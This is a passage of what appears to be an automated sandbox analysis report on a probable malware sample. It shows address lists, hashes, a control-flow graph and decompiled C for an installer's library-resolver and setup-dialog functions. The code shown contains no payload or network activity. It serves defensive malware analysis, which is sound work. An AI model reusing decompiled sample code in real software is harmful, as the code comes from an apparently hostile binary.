                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x0040621d
                          0x00406220
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c0
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x004063f7
                          0x004063f7
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406199
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x004068d2
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
                          0x004068ee
                          0x004068ee
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406107
                          0x00000000
                          0x00406107
                          0x00406193
                          0x0040609c
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x00000000
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x00406424
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x00000000
                          0x004066b5
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00000000
                          0x00406828
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x00000000
                          0x0040667d
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                          • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
                          • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                          • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405DA3 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00405DA3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409218);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                          0x00405dab
                          0x00405dae
                          0x00405db5
                          0x00405dbd
                          0x00405dca
                          0x00000000
                          0x00405dd1
                          0x00405dc0
                          0x00405dc8
                          0x00000000
                          0x00000000
                          0x00405dd9

                          APIs
                          • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                          • LoadLibraryA.KERNEL32(?), ref: 00405DC0
                          • GetProcAddress.KERNEL32(00000000,?,?,00000000,00403268,00000008), ref: 00405DD1
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: AddressHandleLibraryLoadModuleProc
                          • String ID:
                          • API String ID: 310444273-0
                          • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                          • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
                          • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                          • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403964 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 106 403964-403976 107 403ab7-403ac6 106->107 108 40397c-403982 106->108 110 403b15-403b2a 107->110 111 403ac8-403b10 GetDlgItem * 2 call 403e37 SetClassLongA call 40140b 107->111 108->107 109 403988-403991 108->109 112 403993-4039a0 SetWindowPos 109->112 113 4039a6-4039a9 109->113 115 403b6a-403b6f call 403e83 110->115 116 403b2c-403b2f 110->116 111->110 112->113 118 4039c3-4039c9 113->118 119 4039ab-4039bd ShowWindow 113->119 124 403b74-403b8f 115->124 121 403b31-403b3c call 401389 116->121 122 403b62-403b64 116->122 125 4039e5-4039e8 118->125 126 4039cb-4039e0 DestroyWindow 118->126 119->118 121->122 137 403b3e-403b5d SendMessageA 121->137 122->115 123 403e04 122->123 132 403e06-403e0d 123->132 130 403b91-403b93 call 40140b 124->130 131 403b98-403b9e 124->131 135 4039ea-4039f6 SetWindowLongA 125->135 136 4039fb-403a01 125->136 133 403de1-403de7 126->133 130->131 140 403dc2-403ddb DestroyWindow EndDialog 131->140 141 403ba4-403baf 131->141 133->123 138 403de9-403def 133->138 135->132 142 403aa4-403ab2 call 403e9e 136->142 143 403a07-403a18 GetDlgItem 136->143 137->132 138->123 145 403df1-403dfa ShowWindow 138->145 140->133 141->140 146 403bb5-403c02 call 405aa7 call 403e37 * 3 GetDlgItem 141->146 142->132 147 403a37-403a3a 143->147 148 403a1a-403a31 SendMessageA IsWindowEnabled 143->148 145->123 176 403c04-403c09 146->176 177 403c0c-403c48 ShowWindow EnableWindow call 403e59 EnableWindow 146->177 149 403a3c-403a3d 147->149 150 403a3f-403a42 147->150 148->123 148->147 153 403a6d-403a72 call 403e10 149->153 154 403a50-403a55 150->154 155 403a44-403a4a 150->155 153->142 157 403a8b-403a9e SendMessageA 154->157 159 403a57-403a5d 154->159 155->157 158 403a4c-403a4e 155->158 157->142 158->153 162 403a74-403a7d call 40140b 159->162 163 403a5f-403a65 call 40140b 159->163 162->142 172 403a7f-403a89 162->172 174 403a6b 163->174 172->174 174->153 176->177 180 403c4a-403c4b 177->180 181 403c4d 177->181 182 403c4f-403c7d GetSystemMenu EnableMenuItem SendMessageA 180->182 181->182 183 403c92 182->183 184 403c7f-403c90 SendMessageA 182->184 185 403c98-403cd1 call 403e6c call 405a85 lstrlenA call 405aa7 SetWindowTextA call 401389 183->185 184->185 185->124 194 403cd7-403cd9 185->194 194->124 195 403cdf-403ce3 194->195 196 403d02-403d16 DestroyWindow 195->196 197 403ce5-403ceb 195->197 196->133 199 403d1c-403d49 CreateDialogParamA 196->199 197->123 198 403cf1-403cf7 197->198 198->124 200 403cfd 198->200 199->133 201 403d4f-403da6 call 403e37 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 199->201 200->123 201->123 206 403da8-403dc0 ShowWindow call 403e83 201->206 206->133
                          C-Code - Quality: 84%
                          			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t141;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42047c = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420490 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f458 = _t91;
						E00403E37(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42047c = 1;
					}
					_t122 =  *0x4091bc; // 0x0
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E83(0x40b);
						while(1) {
							_t37 =  *0x42047c;
							 *0x4091bc =  *0x4091bc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091bc; // 0x0
							__eflags = _t39 -  *0x423ec4; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133; // 0x7fffffff
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423ec4; // 0x2
							__eflags =  *0x4091bc - _t44; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E37(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E59(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f458, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420490);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f458);
							}
							E00403E6C();
							E00405A85(0x420498, "fwwmjbqpxzax Setup");
							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420498);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc68 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E37(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133; // 0x7fffffff
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403E83(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678); // executed
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f860);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c - _t133; // 0x7fffffff
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403E9E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f860 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E10();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f860 = _t127;
										goto L21;
									}
									__eflags =  *0x4091bc - _t133; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						_t141 =  *0x421498 - _t133; // 0x0
						if(_t141 == 0) {
							_t142 =  *0x423678 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421498 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

































                          0x0040396d
                          0x00403976
                          0x00403ab7
                          0x00403abb
                          0x00403abf
                          0x00403ac1
                          0x00403ac6
                          0x00403ad1
                          0x00403adc
                          0x00403ae1
                          0x00403ae3
                          0x00403ae5
                          0x00403ae8
                          0x00403aed
                          0x00403afb
                          0x00403b08
                          0x00403b0f
                          0x00403b0f
                          0x00403b10
                          0x00403b10
                          0x00403b15
                          0x00403b1b
                          0x00403b22
                          0x00403b28
                          0x00403b2a
                          0x00403b6a
                          0x00403b6f
                          0x00403b74
                          0x00403b74
                          0x00403b79
                          0x00403b82
                          0x00403b84
                          0x00403b89
                          0x00403b8f
                          0x00403b93
                          0x00403b93
                          0x00403b98
                          0x00403b9e
                          0x00000000
                          0x00000000
                          0x00403ba4
                          0x00403ba9
                          0x00403baf
                          0x00000000
                          0x00000000
                          0x00403bb8
                          0x00403bc0
                          0x00403bc5
                          0x00403bc8
                          0x00403bce
                          0x00403bd3
                          0x00403bd6
                          0x00403bdc
                          0x00403be1
                          0x00403be4
                          0x00403bea
                          0x00403bf2
                          0x00403bf8
                          0x00403bfe
                          0x00403c02
                          0x00403c09
                          0x00403c09
                          0x00403c09
                          0x00403c13
                          0x00403c25
                          0x00403c31
                          0x00403c36
                          0x00403c40
                          0x00403c46
                          0x00403c48
                          0x00403c4d
                          0x00403c4a
                          0x00403c4a
                          0x00403c4a
                          0x00403c5d
                          0x00403c75
                          0x00403c77
                          0x00403c7d
                          0x00403c92
                          0x00403c7f
                          0x00403c88
                          0x00403c8a
                          0x00403c8a
                          0x00403c98
                          0x00403ca8
                          0x00403cb9
                          0x00403cc0
                          0x00403cc6
                          0x00403cca
                          0x00403ccf
                          0x00403cd1
                          0x00000000
                          0x00403cd7
                          0x00403cd7
                          0x00403cd9
                          0x00000000
                          0x00000000
                          0x00403cdf
                          0x00403ce3
                          0x00403d08
                          0x00403d0e
                          0x00403d14
                          0x00403d16
                          0x00000000
                          0x00000000
                          0x00403d3c
                          0x00403d42
                          0x00403d44
                          0x00403d49
                          0x00000000
                          0x00000000
                          0x00403d4f
                          0x00403d52
                          0x00403d55
                          0x00403d6c
                          0x00403d78
                          0x00403d91
                          0x00403d97
                          0x00403d9b
                          0x00403da0
                          0x00403da6
                          0x00000000
                          0x00000000
                          0x00403db0
                          0x00403dbb
                          0x00000000
                          0x00403dbb
                          0x00403ce5
                          0x00403ceb
                          0x00000000
                          0x00000000
                          0x00403cf1
                          0x00403cf7
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403cfd
                          0x00403cd1
                          0x00403dc8
                          0x00403dd4
                          0x00403ddb
                          0x00000000
                          0x00403b2c
                          0x00403b2c
                          0x00403b2f
                          0x00403b62
                          0x00403b62
                          0x00403b64
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403b64
                          0x00403b31
                          0x00403b35
                          0x00403b3a
                          0x00403b3c
                          0x00000000
                          0x00000000
                          0x00403b4c
                          0x00403b54
                          0x00000000
                          0x00403b5a
                          0x00403988
                          0x00403988
                          0x0040398c
